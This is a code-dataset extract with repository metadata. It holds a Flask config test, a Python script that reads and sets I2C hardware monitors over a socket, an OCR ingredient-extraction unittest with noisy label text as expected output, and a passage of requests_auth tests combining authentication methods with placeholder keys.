] | null | null | null | tests/test_factory.py | maxrousseau/densys.org | 44b1e08f8cf762f18eb221b37f2a68e6af577172 | [
"MIT"
] | null | null | null | #-*- coding: utf-8 -*-
from densys import create_app
def test_config():
assert not create_app().testing
| 15.714286 | 35 | 0.690909 | 16 | 110 | 4.5625 | 0.875 | 0.246575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0.172727 | 110 | 6 | 36 | 18.333333 | 0.791209 | 0.190909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9052b9febe680fa1dfd984a2be41a13ce109349b | 13,760 | py | Python | Software/util/i2c_control.py | ymei/MimosaBMRDO | e73ce698376a7d38ed17486de217397e66bbc864 | [
"TCP-wrappers"
] | 1 | 2018-09-06T08:26:59.000Z | 2018-09-06T08:26:59.000Z | Software/util/i2c_control.py | ymei/MimosaBMRDO | e73ce698376a7d38ed17486de217397e66bbc864 | [
"TCP-wrappers"
] | null | null | null | Software/util/i2c_control.py | ymei/MimosaBMRDO | e73ce698376a7d38ed17486de217397e66bbc864 | [
"TCP-wrappers"
] | 3 | 2016-08-31T22:29:19.000Z | 2020-07-22T08:41:02.000Z | from command import *
import socket
import time
pulseDelay=0.5
###################################################
# functions for AD7993 control
###################################################
def i2c_ad7993_initial(s,cmd): # initial AD7993
# -- set configuration reg to enable ch1~4 (cycle through)
ret = cmd.cmd_write_register(0,0x2201) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0xf802) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- set configration reg to run in mode 3, Tconv * 512 (0x05 into reg@0x03)
ret = cmd.cmd_write_register(0,0x2201) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0503) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- set read address
ret = cmd.cmd_write_register(0,0x2200) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
return 0
def i2c_ad7993_chipvdd_r(s,cmd): # read VDD for chips --channel 1
# -- start conversion
ret = cmd.cmd_write_register(0,0x2200) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0010) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- read conversion result reg
ret = cmd.cmd_write_register(0,0x2205) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_read_status(0) # read data
s.sendall(ret)
data = s.recv(4)
print [hex(ord(w)) for w in data]
return data
def i2c_ad7993_mimosavdd_r(s,cmd): # read VDD for chips --channel 2
# -- start conversion
ret = cmd.cmd_write_register(0,0x2200) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0020) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- read conversion result reg
ret = cmd.cmd_write_register(0,0x2205) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_read_status(0) # read data
s.sendall(ret)
data = s.recv(4)
print [hex(ord(w)) for w in data]
return data
def i2c_ad7993_ichip_r(s,cmd): # read VDD for chips --channel 3
# -- start conversion
ret = cmd.cmd_write_register(0,0x2200) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0040) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- read conversion result reg
ret = cmd.cmd_write_register(0,0x2205) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_read_status(0) # read data
s.sendall(ret)
data = s.recv(4)
print [hex(ord(w)) for w in data]
return data
def i2c_ad7993_imim_r(s,cmd): # read VDD for chips --channel 4
# -- start conversion
ret = cmd.cmd_write_register(0,0x2200) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0080) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- read conversion result reg
ret = cmd.cmd_write_register(0,0x2205) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_read_status(0) # read data
s.sendall(ret)
data = s.recv(4)
print [hex(ord(w)) for w in data]
return data
###################################################
# functions for AD7418 control
###################################################
def i2c_ad7418_initial(s,cmd): # initial AD7418
# -- set configration reg to run on shut down mode
ret = cmd.cmd_write_register(0,0x2801) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0001) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- set configration reg2 to run on sample by soft
ret = cmd.cmd_write_register(0,0x2800) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
return 0
def i2c_ad7418_itself_tmp_r(s,cmd): # read tmperature from MIMOSA chips
# -- start conversion powerup and shutdown
ret = cmd.cmd_write_register(0,0x2801) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0001) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_write_register(0,0x2801) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0101) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- read conversion result reg
ret = cmd.cmd_write_register(0,0x2800) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_write_register(0,0x2805) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_read_status(0) # read data
s.sendall(ret)
data = s.recv(4)
print [hex(ord(w)) for w in data]
return data
def i2c_ad7418_mimosa_tmp_r(s,cmd): # read tmperature from ad7418 itself
# -- start conversion powerup and shutdown
ret = cmd.cmd_write_register(0,0x2801) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x8001) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_write_register(0,0x2801) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x8101) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- read conversion result reg
ret = cmd.cmd_write_register(0,0x2800) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0004) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_write_register(0,0x2805) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_read_status(0) # read data
s.sendall(ret)
data = s.recv(4)
print [hex(ord(w)) for w in data]
return data
###################################################
# functions for AD5252 control
###################################################
def i2c_ad5252_pot_chip(s,cmd,data): # set pot for chip power
# -- set EEMEM value for RDAC1
ret = cmd.cmd_write_register(0,0x2C01) # set slave address,mode,wr
s.sendall(ret)
sdata = data<<8 | 0x21
ret = cmd.cmd_write_register(1,sdata) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- restore EEMEM to RDC
ret = cmd.cmd_write_register(0,0x2C00) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x00b8) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- set NOP command
ret = cmd.cmd_write_register(0,0x2C00) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0080) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
return 0
def i2c_ad5252_pot_mimosa(s,cmd,data): # set pot for mimosa power
# -- set EEMEM value for RDAC3
ret = cmd.cmd_write_register(0,0x2C01) # set slave address,mode,wr
s.sendall(ret)
sdata = data<<8 | 0x23
ret = cmd.cmd_write_register(1,sdata) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- restore EEMEM to RDC
ret = cmd.cmd_write_register(0,0x2C00) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x00b8) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- set NOP command
ret = cmd.cmd_write_register(0,0x2C00) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0080) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
return 0
###################################################
# functions for LTC2635 control
###################################################
def i2c_ltc2635_thre_vchip(s,cmd,data): # set DAC out for threshold of thre_vchip
ret = cmd.cmd_write_register(0,0x4102) # set slave address,mode,wr
s.sendall(ret)
sdata = ((data>>4)<<8) | 0x30
ret = cmd.cmd_write_register(1,sdata) # set write address and write data0
s.sendall(ret)
sdata = (data & 0xf)<<4
ret = cmd.cmd_write_register(2,sdata) # set write address and write data1
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
return 0
def i2c_ltc2635_thre_vmim(s,cmd,data): # set DAC out for threshold of thre_vmim
ret = cmd.cmd_write_register(0,0x4102) # set slave address,mode,wr
s.sendall(ret)
sdata = ((data>>4)<<8) | 0x31
ret = cmd.cmd_write_register(1,sdata) # set write address and write data0
s.sendall(ret)
sdata = (data & 0xf)<<4
ret = cmd.cmd_write_register(2,sdata) # set write address and write data1
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
return 0
###################################################
# functions for PCF8574 control
###################################################
def i2c_pcf8574_reset_latchup(s,cmd): # reset latchup of PCF8574
# -- set LV_vchip and LV_vmim to 0
ret = cmd.cmd_write_register(0,0x2100) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- set LV_vchip and LV_vmim back to 1
ret = cmd.cmd_write_register(0,0x2100) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x00ff) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
return 0
def i2c_pcf8574_read_latchup(s,cmd): # reset latchup of PCF8574
ret = cmd.cmd_write_register(0,0x2104) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_read_status(0) # read data
s.sendall(ret)
data = s.recv(4)
print [hex(ord(w)) for w in data]
return data
def bitmix(x): # handle FPGA internal wire connection bit mixing
return (x & 0x03) << 32 | (x & 0x4) << 29 | (x & 0x7f00) << 16 | (x & 0xff0000)<<0 | (x & 0xff000000)>>16 | (x & 0xff00000000) >> 32
def i2c_prep_cont_read(s, cmd): # prepare for continuous read and integration into data stream
# ad7418 adc0
# ad7418 internal temp : 0x00002805
# ad7993 : 0x00002205
# pcf8574 i2c_command(35 downto 0) <= config_reg(112+34 downto 112) : 0x00002105
wd = bitmix(0x00002805) | bitmix(0x00002805) << 35 | bitmix(0x00002205) << 70 | bitmix(0x00002105) << 105 | (0xf << 140)
for i in xrange(9):
ret = cmd.cmd_write_register(7+i, (wd >> (16 * i))& 0xffff)
s.sendall(ret)
if __name__ == "__main__":
host = '192.168.2.3'
port = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
cmd = Cmd()
data = i2c_ad7993_chipvdd_r(s,cmd)
s.close()
| 37.088949 | 136 | 0.66032 | 2,119 | 13,760 | 4.156678 | 0.092968 | 0.072888 | 0.108311 | 0.106494 | 0.871367 | 0.860581 | 0.846276 | 0.833106 | 0.820845 | 0.820845 | 0 | 0.074723 | 0.194695 | 13,760 | 370 | 137 | 37.189189 | 0.720152 | 0.280378 | 0 | 0.847896 | 0 | 0 | 0.002057 | 0 | 0 | 0 | 0.06518 | 0 | 0 | 0 | null | null | 0 | 0.009709 | null | null | 0.022654 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
90a615cff1ae4570bb8b8bcdabf1af1f056ddd36 | 9,349 | py | Python | Tests/test_vision_api.py | firstgenius/Cosmetics-Check | a167b35297805894b4c5a8d824402e00e7102494 | [
"MIT"
] | 2 | 2021-05-17T12:23:45.000Z | 2021-05-17T12:23:50.000Z | Tests/test_vision_api.py | firstgenius/Cosmetics-Check | a167b35297805894b4c5a8d824402e00e7102494 | [
"MIT"
] | null | null | null | Tests/test_vision_api.py | firstgenius/Cosmetics-Check | a167b35297805894b4c5a8d824402e00e7102494 | [
"MIT"
] | null | null | null | import unittest
from vision_api import Knot, Cream
from unittest import TestCase
class TestVisionAPI(TestCase):
def setUp(self):
self.cream = Cream()
with open('example.jpg', 'rb') as f:
self.photo1 = f.read()
with open('example2.jpg', 'rb') as f:
self.photo2 = f.read()
detected_text_1 = self.cream.detect_text(self.photo1)
self.processed_text_1 = self.cream.process_text(detected_text_1)
detected_text_2 = self.cream.detect_text(self.photo2)
self.processed_text_2 = self.cream.process_text(detected_text_2)
def test_process_text(self):
result_1 = ['Drug Facts', 'Purpose', 'Active ingredient', 'Petrolatum 46.5%', '.Skin protectant (ointment)', \
'Uses', 'I temporarily protects and helps relieve chafed', 'chapped or cracked skin', 'I temporarily protects minor:', \
'I cuts scrapes burns', 'Ihelps protect from the drying effects of wind and cold weather.', 'Warnings', 'For external use only', \
'When using this product do not get into eyes', 'Stop use and ask a doctor if condition worsens symptoms last', \
'more than 7 days or clear up and occur again within a few days', 'Do not use on', 'deep or puncture wounds', \
'Keep out of reach of children. If swallowed', 'get medical help or contact', 'a Poison Control Center immediately', \
'animal bites serious burns', 'Directions', 'apply as needed', 'Inactive ingredients', 'mineral oil', 'paraffin', 'ozokerite', 'dimethicone', \
'hyaluronic acid', 'sodium', 'ydroxide', 'ceramide 1', 'ceramide 3', 'ceramide 6-11', 'tocopheryl acetate', 'phytosphingosine', 'cholesterol', \
'sodium lauroyl lactylate', 'carbomer', 'anthenol', 'water', 'L-proline', 'xanthan gum', 'Questions?', 'B6-free number 1-888-768-2915', \
'ww.cerave.com', 'ile LLC', 'New York', 'NY 10001', 'in USA', 'terave.com', 'ons or Comments? 1-888-768-2915', '02422']
result_2 = ['ВАША КОЖА СклонНА К ПОЯВЛЕНИЮ НЕСОВЕРШЕНСТВ?', 'Мультифункциональная антибактериальная формула косметического средства', 'ОЧИЩЕНИЕ R1 ПРОТИВ НЕСОВЕРШЕНСТВ от NIVEA@ обогащена натуральным', \
'1. Средстве ывания: сокращает и предотвращает появлен в ного блеска', '12 Скраб: рас ет закупоренные поры', 'освобождает кож точек и', 'страктом лии и белой глиной:', 'надолго.', 'Помогает бо с бактериями', \
'вызывающими воспалет', 'Маска: испол я в начестве маски при нане н', 'еколько', 'минут. Улучшае пица', 'HACNAAMTECB 4NCTO M 3AOPOBBIM BMHONTNTEGƯONGE', 'а оубоко очишщена', 'лзаметно более здорсвая', \
'MМЕНЕНИЕ: МЯгкими масерующими ноурвъми никоиями нанесите средство', 'мажную кожу лица', 'шек вбдасти дена смате теплой водой. Используя в', 'вестве маски', 'оставьте на каже на 5- мину загам смойте. Избегайте области', \
'о паз. Ислользуйте ежедневно', 'с качестве маски - 2-3 раза в неделю.', 'к отимального результата используйте всю линию средств NIVEA для проблемной', 'ДЕРМАТОЛОГИЧЕСКИ ПРОТЕСТИРОВАНО.', \
'Fapююривает поры. Использование в пищевых целях опасно для жизни и здоровы.', 'акб для очищення 3 в 1 проти недоліків шкіри від NIVEA®', 'оведено во Франции', 'Космева С.А.С.', 'COSMEVA S.A.S.', \
'1 гuе des Sources F-77176', 'lemple', 'France. Bироблено у Франції', 'Космева С.А.С. Эксклюзивный импорея', 'ок 000 "Байерсдорф"', 'РФ', '105064', 'г. Москва', 'ул. Земляной Вал', 'дом 9. Телефм', \
'мни: 8-800-2000-753. Звонок по России бесплатный. Iмпортер в Укран:', 'кродорф Україна»', 'Україна', 'Київ-04119', 'вул. Дегтярівська 27Т. Годен дод', 'а: см', 'упаковку. Використати до: див. на упаковці. Умови зберiгання: п', \
'р 5-25°С', 'та відносній вологості <80%. Дата виробництва: за 30 міскцв да', 'аинористання.', 'Состав/Склад: Aqua', 'Kаolin', 'Glycerin', 'Alcohol Denat (3% od)', 'Glyceryl Stearate', 'Cetearyl Alcohol', 'Microcrystalline Ce', \
'Butyrospermum Parkii Butter', 'Caprylic/Capric Triglyceride', 'e', 'Magnolia Officinalis Bark Extract', 'Glyceryl Glucoside', 'Potassiom Ca', 'M Phosphate', 'Hydrogenated Palm Glycerides', 'Xanthan Gum', 'Dimethan', \
'Hydrogenated Castor Oil', 'Trisodium EDTA', 'Phenaxyethanol', 'Me', 'paraben', 'Alpha-Isomethyl lonone', 'Citronellol', 'Limonene', 'Par', 'CI 77891', 'CI 42090', 'Арт. 82305', '82305.986.BA.07', 'www.NIVEA.com', '150M', '動台', \
'Beiersdorf AG', 'D-20245 Наmburg', 'reg. tm. of Beiersdorf AG', 'Germany', 'LDPE', 'Beiersdorf', 'Hamburg', '• Wien']
self.assertEqual(self.processed_text_1, result_1)
self.assertEqual(self.processed_text_2, result_2)
def test_find_ingredients(self):
result_1 = ['Drug Facts', 'Purpose', 'Active ingredient', 'Petrolatum 46.5%', '.Skin protectant (ointment)', \
'Uses', 'I temporarily protects and helps relieve chafed', 'chapped or cracked skin', 'I temporarily protects minor:', \
'I cuts scrapes burns', 'Ihelps protect from the drying effects of wind and cold weather.', 'Warnings', 'For external use only', \
'When using this product do not get into eyes', 'Stop use and ask a doctor if condition worsens symptoms last', \
'more than 7 days or clear up and occur again within a few days', 'Do not use on', 'deep or puncture wounds', \
'Keep out of reach of children. If swallowed', 'get medical help or contact', 'a Poison Control Center immediately', \
'animal bites serious burns', 'Directions', 'apply as needed', 'Inactive ingredients', 'mineral oil', 'paraffin', 'ozokerite', 'dimethicone', \
'hyaluronic acid', 'sodium', 'ydroxide', 'ceramide 1', 'ceramide 3', 'ceramide 6-11', 'tocopheryl acetate', 'phytosphingosine', 'cholesterol', \
'sodium lauroyl lactylate', 'carbomer', 'anthenol', 'water', 'L-proline', 'xanthan gum', 'Questions?', 'B6-free number 1-888-768-2915', \
'ww.cerave.com', 'ile LLC', 'New York', 'NY 10001', 'in USA', 'terave.com', 'ons or Comments? 1-888-768-2915', '02422']
result_2 = ['ВАША КОЖА СклонНА К ПОЯВЛЕНИЮ НЕСОВЕРШЕНСТВ?', 'Мультифункциональная антибактериальная формула косметического средства', 'ОЧИЩЕНИЕ R1 ПРОТИВ НЕСОВЕРШЕНСТВ от NIVEA@ обогащена натуральным', \
'1. Средстве ывания: сокращает и предотвращает появлен в ного блеска', '12 Скраб: рас ет закупоренные поры', 'освобождает кож точек и', 'страктом лии и белой глиной:', 'надолго.', 'Помогает бо с бактериями', \
'вызывающими воспалет', 'Маска: испол я в начестве маски при нане н', 'еколько', 'минут. Улучшае пица', 'HACNAAMTECB 4NCTO M 3AOPOBBIM BMHONTNTEGƯONGE', 'а оубоко очишщена', 'лзаметно более здорсвая', \
'MМЕНЕНИЕ: МЯгкими масерующими ноурвъми никоиями нанесите средство', 'мажную кожу лица', 'шек вбдасти дена смате теплой водой. Используя в', 'вестве маски', 'оставьте на каже на 5- мину загам смойте. Избегайте области', \
'о паз. Ислользуйте ежедневно', 'с качестве маски - 2-3 раза в неделю.', 'к отимального результата используйте всю линию средств NIVEA для проблемной', 'ДЕРМАТОЛОГИЧЕСКИ ПРОТЕСТИРОВАНО.', \
'Fapююривает поры. Использование в пищевых целях опасно для жизни и здоровы.', 'акб для очищення 3 в 1 проти недоліків шкіри від NIVEA®', 'оведено во Франции', 'Космева С.А.С.', 'COSMEVA S.A.S.', \
'1 гuе des Sources F-77176', 'lemple', 'France. Bироблено у Франції', 'Космева С.А.С. Эксклюзивный импорея', 'ок 000 "Байерсдорф"', 'РФ', '105064', 'г. Москва', 'ул. Земляной Вал', 'дом 9. Телефм', \
'мни: 8-800-2000-753. Звонок по России бесплатный. Iмпортер в Укран:', 'кродорф Україна»', 'Україна', 'Київ-04119', 'вул. Дегтярівська 27Т. Годен дод', 'а: см', 'упаковку. Використати до: див. на упаковці. Умови зберiгання: п', \
'р 5-25°С', 'та відносній вологості <80%. Дата виробництва: за 30 міскцв да', 'аинористання.', 'Состав/Склад: Aqua', 'Kаolin', 'Glycerin', 'Alcohol Denat (3% od)', 'Glyceryl Stearate', 'Cetearyl Alcohol', 'Microcrystalline Ce', \
'Butyrospermum Parkii Butter', 'Caprylic/Capric Triglyceride', 'e', 'Magnolia Officinalis Bark Extract', 'Glyceryl Glucoside', 'Potassiom Ca', 'M Phosphate', 'Hydrogenated Palm Glycerides', 'Xanthan Gum', 'Dimethan', \
'Hydrogenated Castor Oil', 'Trisodium EDTA', 'Phenaxyethanol', 'Me', 'paraben', 'Alpha-Isomethyl lonone', 'Citronellol', 'Limonene', 'Par', 'CI 77891', 'CI 42090', 'Арт. 82305', '82305.986.BA.07', 'www.NIVEA.com', '150M', '動台', \
'Beiersdorf AG', 'D-20245 Наmburg', 'reg. tm. of Beiersdorf AG', 'Germany', 'LDPE', 'Beiersdorf', 'Hamburg', '• Wien']
ingredients_1 = self.cream.find_ingredients(self.photo1)
ingredients_2 = self.cream.find_ingredients(self.photo2)
self.assertEqual(ingredients_1, result_1)
self.assertEqual(ingredients_2, result_2)
| 119.858974 | 250 | 0.645203 | 1,149 | 9,349 | 5.222802 | 0.385553 | 0.010498 | 0.011331 | 0.007332 | 0.937011 | 0.900183 | 0.889518 | 0.889518 | 0.889518 | 0.889518 | 0 | 0.03904 | 0.224623 | 9,349 | 77 | 251 | 121.415584 | 0.787695 | 0 | 0 | 0.666667 | 0 | 0 | 0.664258 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 1 | 0.045455 | false | 0 | 0.045455 | 0 | 0.106061 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
291ae31b2e7bf5682f8a71ec24f79da49ef8bb82 | 18,557 | py | Python | tests/test_add_operator.py | StijnCaerts/requests_auth | 5cbdd329555dbabd4d6347ba2104a950eb72ab2c | [
"MIT"
] | 24 | 2018-07-23T09:43:00.000Z | 2022-02-07T18:05:21.000Z | tests/test_add_operator.py | StijnCaerts/requests_auth | 5cbdd329555dbabd4d6347ba2104a950eb72ab2c | [
"MIT"
] | 48 | 2018-09-06T05:29:08.000Z | 2022-02-14T14:28:59.000Z | tests/test_add_operator.py | StijnCaerts/requests_auth | 5cbdd329555dbabd4d6347ba2104a950eb72ab2c | [
"MIT"
] | 11 | 2018-09-29T16:30:39.000Z | 2022-02-23T13:06:41.000Z | import datetime
from responses import RequestsMock
import requests
import requests_auth
from requests_auth.testing import BrowserMock, create_token, token_cache, browser_mock
from tests.auth_helper import get_header
def test_basic_and_api_key_authentication_can_be_combined(responses: RequestsMock):
basic_auth = requests_auth.Basic("test_user", "test_pwd")
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
header = get_header(responses, basic_auth + api_key_auth)
assert header.get("Authorization") == "Basic dGVzdF91c2VyOnRlc3RfcHdk"
assert header.get("X-Api-Key") == "my_provided_api_key"
def test_header_api_key_and_multiple_authentication_can_be_combined(
token_cache, responses: RequestsMock
):
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
api_key_auth2 = requests_auth.HeaderApiKey(
"my_provided_api_key2", header_name="X-Api-Key2"
)
api_key_auth3 = requests_auth.HeaderApiKey(
"my_provided_api_key3", header_name="X-Api-Key3"
)
header = get_header(responses, api_key_auth + (api_key_auth2 + api_key_auth3))
assert header.get("X-Api-Key") == "my_provided_api_key"
assert header.get("X-Api-Key2") == "my_provided_api_key2"
assert header.get("X-Api-Key3") == "my_provided_api_key3"
def test_multiple_auth_and_header_api_key_can_be_combined(
token_cache, responses: RequestsMock
):
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
api_key_auth2 = requests_auth.HeaderApiKey(
"my_provided_api_key2", header_name="X-Api-Key2"
)
api_key_auth3 = requests_auth.HeaderApiKey(
"my_provided_api_key3", header_name="X-Api-Key3"
)
header = get_header(responses, (api_key_auth + api_key_auth2) + api_key_auth3)
assert header.get("X-Api-Key") == "my_provided_api_key"
assert header.get("X-Api-Key2") == "my_provided_api_key2"
assert header.get("X-Api-Key3") == "my_provided_api_key3"
def test_multiple_auth_and_multiple_auth_can_be_combined(
token_cache, responses: RequestsMock
):
api_key_auth = requests_auth.HeaderApiKey("my_provided_api_key")
api_key_auth2 = requests_auth.HeaderApiKey(
"my_provided_api_key2", header_name="X-Api-Key2"
)
api_key_auth3 = requests_auth.HeaderApiKey(
"my_provided_api_key3", header_name="X-Api-Key3"
)
api_key_auth4 = requests_auth.HeaderApiKey(
"my_provided_api_key4", header_name="X-Api-Key4"
)
header = get_header(
responses, (api_key_auth + api_key_auth2) + (api_key_auth3 + api_key_auth4)
)
assert header.get("X-Api-Key") == "my_provided_api_key"
assert header.get("X-Api-Key2") == "my_provided_api_key2"
assert header.get("X-Api-Key3") == "my_provided_api_key3"
assert header.get("X-Api-Key4") == "my_provided_api_key4"
def test_basic_and_multiple_authentication_can_be_combined(
token_cache, responses: RequestsMock
):
basic_auth = requests_auth.Basic("test_user", "test_pwd")
api_key_auth2 = requests_auth.HeaderApiKey(
"my_provided_api_key2", header_name="X-Api-Key2"
)
api_key_auth3 = requests_auth.HeaderApiKey(
"my_provided_api_key3", header_name="X-Api-Key3"
)
header = get_header(responses, basic_auth + (api_key_auth2 + api_key_auth3))
assert header.get("Authorization") == "Basic dGVzdF91c2VyOnRlc3RfcHdk"
assert header.get("X-Api-Key2") == "my_provided_api_key2"
assert header.get("X-Api-Key3") == "my_provided_api_key3"
def test_query_api_key_and_multiple_authentication_can_be_combined(
token_cache, responses: RequestsMock
):
api_key_auth = requests_auth.QueryApiKey("my_provided_api_key")
api_key_auth2 = requests_auth.QueryApiKey(
"my_provided_api_key2", query_parameter_name="api_key2"
)
api_key_auth3 = requests_auth.HeaderApiKey(
"my_provided_api_key3", header_name="X-Api-Key3"
)
# Mock a dummy response
responses.add(responses.GET, "http://authorized_only")
# Send a request to this dummy URL with authentication
response = requests.get(
"http://authorized_only", auth=api_key_auth + (api_key_auth2 + api_key_auth3)
)
# Return headers received on this dummy URL
assert (
response.request.path_url
== "/?api_key=my_provided_api_key&api_key2=my_provided_api_key2"
)
